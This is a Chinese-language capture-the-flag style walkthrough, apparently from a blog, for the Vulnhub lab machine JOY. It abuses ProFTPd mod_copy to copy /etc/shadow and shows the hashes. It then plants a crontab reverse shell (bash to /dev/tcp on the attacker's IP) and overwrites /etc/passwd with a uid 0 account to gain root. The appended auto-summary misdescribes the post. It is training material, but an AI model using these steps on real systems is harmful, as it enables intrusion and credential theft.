└─# telnet 192.168.12.143 21
Trying 192.168.12.143...
Connected to 192.168.12.143.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /etc/shadow
350 File or directory exists, ready for destination name
site cpto /home/ftp/shadow
250 Copy successful


成功!

ftp> ls
229 Entering Extended Passive Mode (|||9290|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 04:56 download
-rw-r--r--   1 0        0            2556 Dec 23 05:37 pass
-rw-r--r--   1 0        0            1631 Dec 23 05:42 shadow
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
226 Transfer complete
ftp> get shadow
local: shadow remote: shadow
229 Entering Extended Passive Mode (|||47226|)
150 Opening BINARY mode data connection for shadow (1631 bytes)
100% |*************************|  1631       16.54 MiB/s    00:00 ETA
226 Transfer complete
1631 bytes received in 00:00 (1.69 MiB/s)
ftp>


┌──(root㉿ru)-[~/kali]
└─# cat shadow
root:$6$1xFSccJ0$o0y1Y1wScZ7FSYrsqhwPSYlm58gMeXNI1w336fcuD1qhaJzpKpEFX2BF6KI2Ue.8LGg0ELoPzfMcAjCDyt7pO1:17888:0:99999:7:::

patrick:$6$gp70WRqc$Lx5OEcBPnCh.ADYE7BUvxd0vzQGgDwI6AYMmtkHdJ..5NcbwYgb04DJUx2rmyc6mjxW0We5nDCveoEWnoKAB.0:17888:0:99999:7:::

ftp:$6$tbnbaqvF$gXhtn5Yw9zruUoNwqweryiNV7G/ix1kwvYZ.BPANhndyBXTa5/oMx9UW6XZ6mQMaviuaIfU0/r.abgjBGL2z90:17902:0:99999:7:::

......

既然可以复制成功,说明这个ftppro运行权限很大,我们可以把对方的计划任务拷贝过来,加入反弹shell木马,再上传,也可以直接破解这三个用户的哈希值,从而获取权限!

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.143 21
Trying 192.168.12.143...
Connected to 192.168.12.143.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /etc/crontab
350 File or directory exists, ready for destination name
site cpto /home/ftp/crontab
250 Copy successful

┌──(root㉿ru)-[~/kali]
└─# ftp 192.168.12.143
Connected to 192.168.12.143.
220 The Good Tech Inc. FTP Server
Name (192.168.12.143:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Type set to I
ftp> ls
229 Entering Extended Passive Mode (|||51984|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 0        0             722 Dec 23 06:03 crontab
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 04:56 download
-rw-r--r--   1 0        0            2556 Dec 23 05:37 pass
-rw-r--r--   1 0        0            1631 Dec 23 05:42 shadow
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
226 Transfer complete
ftp> get crontab
local: crontab remote: crontab
229 Entering Extended Passive Mode (|||38333|)
150 Opening BINARY mode data connection for crontab (722 bytes)
100% |*************************|   722        3.86 MiB/s    00:00 ETA
226 Transfer complete
722 bytes received in 00:00 (696.02 KiB/s)

把计划任务修改成如下

┌──(root㉿ru)-[~/kali]
└─# cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/1  *  * * *   root    /bin/bash -c 'bash -i >& /dev/tcp/192.168.12.128/1234 0>&1'
#


ftp> put crontab shell
local: crontab remote: shell
229 Entering Extended Passive Mode (|||34276|)
150 Opening BINARY mode data connection for shell
100% |******************************************************************************************************************************************************|   806        3.76 MiB/s    00:00 ETA
226 Transfer complete
806 bytes sent in 00:00 (1.09 MiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||12672|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 0        0             722 Dec 23 06:03 crontab
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 04:56 download
-rw-r--r--   1 0        0            2556 Dec 23 05:37 pass
-rw-r--r--   1 0        0            1631 Dec 23 05:42 shadow
-rw-r--r--   1 ftp      ftp           806 Dec 23 06:10 shell
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
226 Transfer complete

把修改完的计划任务上传,并修改名称为shell

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.143 21
Trying 192.168.12.143...
Connected to 192.168.12.143.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/shell
350 File or directory exists, ready for destination name
site cpto /etc/crontab
250 Copy successful

然后等待一分钟即可!
补充
version_control这个文件我们也看一下

-rw-r--r--  1 patrick patrick   407 Jan 27  2019 version_control

这个文件是patrick用户的,我们复制到ftp目录下看一下

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.143 21
Trying 192.168.12.143...
Connected to 192.168.12.143.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/version_control
250 Copy successful



┌──(root㉿ru)-[~/kali]
└─# cat version_control
Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.


给了一个目录以及服务的版本信息!   /var/www/tryingharderisjoy   


目录就是首页!

openssl

┌──(root㉿ru)-[~/kali]
└─# openssl passwd -1 -salt woll woll > woll.hash

┌──(root㉿ru)-[~/kali]
└─# cat woll.hash
$1$woll$9u5r6d8vYJoi9rDpwBnEK1

┌──(root㉿ru)-[~/kali]
└─# woll:$1$woll$9u5r6d8vYJoi9rDpwBnEK1:0:0:root:/bin/bash

先生成一个账号密码,然后放在pass里面,然后把pass上传。pass:是我们前面测试从靶机下载下来的文件!

ftp> put pass1 password
local: pass1 remote: password
229 Entering Extended Passive Mode (|||35946|)
150 Opening BINARY mode data connection for password
100% |******************************************************************************************************************************************************|  2611       46.98 MiB/s    00:00 ETA
226 Transfer complete
2611 bytes sent in 00:00 (3.35 MiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||16363|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 0        0             722 Dec 23 06:03 crontab
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 04:56 download
-rw-r--r--   1 0        0            2556 Dec 23 05:37 pass
-rw-r--r--   1 ftp      ftp          2611 Dec 23 06:38 password
-rw-r--r--   1 0        0            1631 Dec 23 05:42 shadow
-rw-r--r--   1 ftp      ftp           806 Dec 23 06:10 shell
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
-rw-r--r--   1 0        0             407 Dec 23 06:22 version_control
226 Transfer complete

上传并改名为password。

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.143 21
Trying 192.168.12.143...
Connected to 192.168.12.143.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/password
350 File or directory exists, ready for destination name
site cpto /etc/passwd
250 Copy successful 


ok了!

注意: 因为靶机原因,我们ssh登录不上去,估计是靶机的ssh服务版本太低了!加上一系列参数还是登不上去!

get root

┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.12.143: inverse host lookup failed: Unknown host
connect to [192.168.12.128] from (UNKNOWN) [192.168.12.143] 37682
bash: cannot set terminal process group (7811): Inappropriate ioctl for device
bash: no job control in this shell
root@JOY:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@JOY:~# cd /root
cd /root
root@JOY:~# ls
ls
author-secret.txt
document-generator.sh
dovecot.crt
dovecot.csr
dovecot.key
permissions.sh
proof.txt
rootCA.key
rootCA.pem
rootCA.srl
root@JOY:~# cat author-secret.txt
cat author-secret.txt
Thanks for joining us!

If you have not rooted MERCY, DEVELOPMENT, BRAVERY, TORMENT, please root them too!

This will conclude the series of five boxes on Vulnhub for pentesting practice, and once again, these were built while thinking about OffSec in mind. :-)

For those who have helped made videos on rooting these boxes, I am more than grateful for your support. This means a lot for the box creator and those who have helped test these boxes. A shoutout to the kind folk from Wizard Labs, Zajt, as well as friends in the local security community which I belong to.

If you found the boxes a good learning experience, feel free to share them with your friends.

As of the time of writing, I will be working on (building) some boxes on Wizard-Labs, in a similar flavour to these boxes. If you enjoyed these, consider pinging them and their project. I think their lab is slowly being built into a nice lab with a variety of machines with good learning value.

I was rather glad someone found me on Linkedin after breaking into these boxes. If you would like to contact the author, you can find some of the author's contact points on his website (https://donavan.sg).

May the r00t be with you.

P.S. Someone asked me, also, about "shesmileslikeabrightsmiley". Yes, indeed, she smiles like a bright smiley. She makes me smile like a bright smiley too? :-)
root@JOY:~# cat proof.txt
cat proof.txt
Never grant sudo permissions on scripts that perform system functions!
root@JOY:~#

总结

提示提取的方式不止这一种,我们其实还可以利用写入webshell的方式进行反弹shell,因为version_control文件已经给了我们web路径;
我们可以通过写入shell的方式获取到一个低权限的shell,然后使用我们上传的账号进行提权,这样也是可以的!

这篇文章包含了一系列命令和输出结果。首先是一些关于arp-scan和netdiscover的命令,用于扫描网络中的ARP表和网络接口。
然后是一些关于nmap的命令,用于主机存活探测和端口探测。最后是一些关于OSSEC漏洞和ftp匿名登陆的命令。
文章中提到了一些IP地址和主机名,以及一些命令的输出结果。其中包括ARP表中的MAC地址、主机存活探测的结果、端口探测的结果,以及ftp服务的登录信息。
文章最后还提到了一些关于wget和ftp的命令,用于下载和登录ftp服务。总的来说,这篇文章包含了一系列命令和输出结果,涉及了网络扫描、漏洞测试和文件下载等内容。
真的学不了一点。。。
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红队全栈学习导图.pdf
03-19
红队全栈学习导图.pdf
红队备忘单:这是为了重新整理我的笔记
02-09
红队备忘单
05-红队测试之邮箱打点.pdf
09-20
"红队测试之邮箱打点" 红队测试是指在红队测试中,对目标邮箱进行测试和攻击的过程。红队测试的目的是为了检测目标邮箱的安全性和漏洞,从而帮助目标邮箱提高安全性和防御能力。本文将从信息收集、邮箱定位、内容...
信息安全_红队技术漫谈@Moriarty.pptx
08-14
关于RedCore R&D的重要性 FSRT天赋技能树 RedCore之干货满满的RedTrain RedCore之不一样的RedOp RedCore之另类的红队学院 RedCore之“锋芒” BypassUAC的终极对决
红队技巧:隐藏windows服务1
08-03
在IT安全领域,红队活动通常模拟黑客攻击行为,用于测试和强化组织的安全防御。本文将探讨一种红队技巧,即如何使用PowerShell隐藏Windows服务,以提高在后渗透测试阶段的持久性和隐蔽性。 首先,创建一个Windows...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
OGSM绩效管理培训材料双份资料.pptx
07-12
OGSM绩效管理培训材料双份资料.pptx
CAD机械设计赛项单选题样题.docx
07-12
CAD机械设计赛项单选题样题
100款古风PPT (79).pptx
最新发布
07-12
【ppt素材】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
搭建zookeeper
07-12
搭建zookeeper
2024年欧洲快速断开配件市场主要企业市场占有率及排名.docx
07-12
2024年欧洲快速断开配件市场主要企业市场占有率及排名.docx
springcloud-基于Spring Boot的微服务开发框架
07-12
Spring Cloud是一套基于Spring Boot的微服务开发框架,它提供了一种构建分布式系统和服务网格的完整解决方案。Spring Cloud的核心目标是利用Spring Boot的自动化配置特性,使开发者能够快速搭建出分布式系统中的各个组件,如服务发现、配置中心、熔断器、智能路由、消息总线、负载均衡、断路器、数据监控等。 Spring Cloud生态系统庞大且功能丰富,其中包含了多个子项目,比如Spring Cloud Netflix(Eureka、Hystrix、Ribbon、Feign等),用于服务发现、断路器、负载均衡和REST客户端;Spring Cloud Config用于集中化配置管理,确保在不同环境下的配置一致性;Spring Cloud Gateway作为API网关,负责路由、过滤和安全控制;Spring Cloud Stream用于构建消息驱动的微服务应用,支持与外部消息中间件的集成;Spring Cloud Sleuth和Zipkin则提供了分布式追踪能力,便于在复杂的服务调用链中定位问题。 Spring Cloud的强大之处在于它将复杂的分布式系统抽
Web开发领域-Node.js技术-HTTP服务器搭建与操作-实验教程及心得
07-12
内容概要: 本实验报告详细记录了一次基于Node.js的Web服务器搭建实验过程,旨在帮助学生掌握Node.js的基本操作和理解HTTP协议的工作原理。实验中,学生通过引入Node.js的内置http模块创建了一个简单的HTTP服务器,设置回调函数处理请求与响应,并学习了如何通过改变Content-Type头来影响页面渲染方式。此外,实验还涉及了如何针对不同URL路径返回特定内容,以及如何使用命令行工具启动和管理服务器。 适用人群: 本资源适合正在学习Web开发基础,特别是Node.js初学者的学生或开发者。对于希望深入了解服务器端编程、HTTP协议及响应类型的人来说尤为有用。 使用场景及目标: 教学场景:作为大学课程《Web平台B》的实验教材,帮助学生实践Node.js编程和Web服务器搭建技能。 自我学习:供个人或小组在课余时间进行自主学习,通过动手实践加深对Node.js和HTTP的理解。 项目准备:为即将开始的Web项目提供基础知识和技能储备,尤其是在使用Node.js构建后端服务时。
个人转正述职报告PPT模板
07-12
【作品名称】:个人转正述职报告PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
IT标准项目管理流程ppt课件两份资料.pptx
07-12
IT标准项目管理流程ppt课件两份资料.pptx
商用密码应用安全性评估从业人员考核题库
07-12
商用密码应用安全性评估从业人员考核题库
08CNE8N-VB TO220一款N-Channel沟道TO220的MOSFET晶体管参数介绍与应用说明
07-12
08CNE8N-VB TO220;Package:TO220;Configuration:Single-N-Channel;VDS:80V;VGS:20(±V);Vth:3V;RDS(ON)=9mΩ@VGS=4.5V;RDS(ON)=7mΩ@VGS=10V;ID:100A;Technology:Trench;
LCD1602资源useless,don‘t download
07-12
LCD1602资源useless,don‘t download
关于通信仿真的基本概念、常用工具和简单示例
07-12
关于通信仿真的基本概念、常用工具和简单示例
从实战看红队进攻技巧.pdf
03-06
2023网络安全创新大会(PPT下载)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值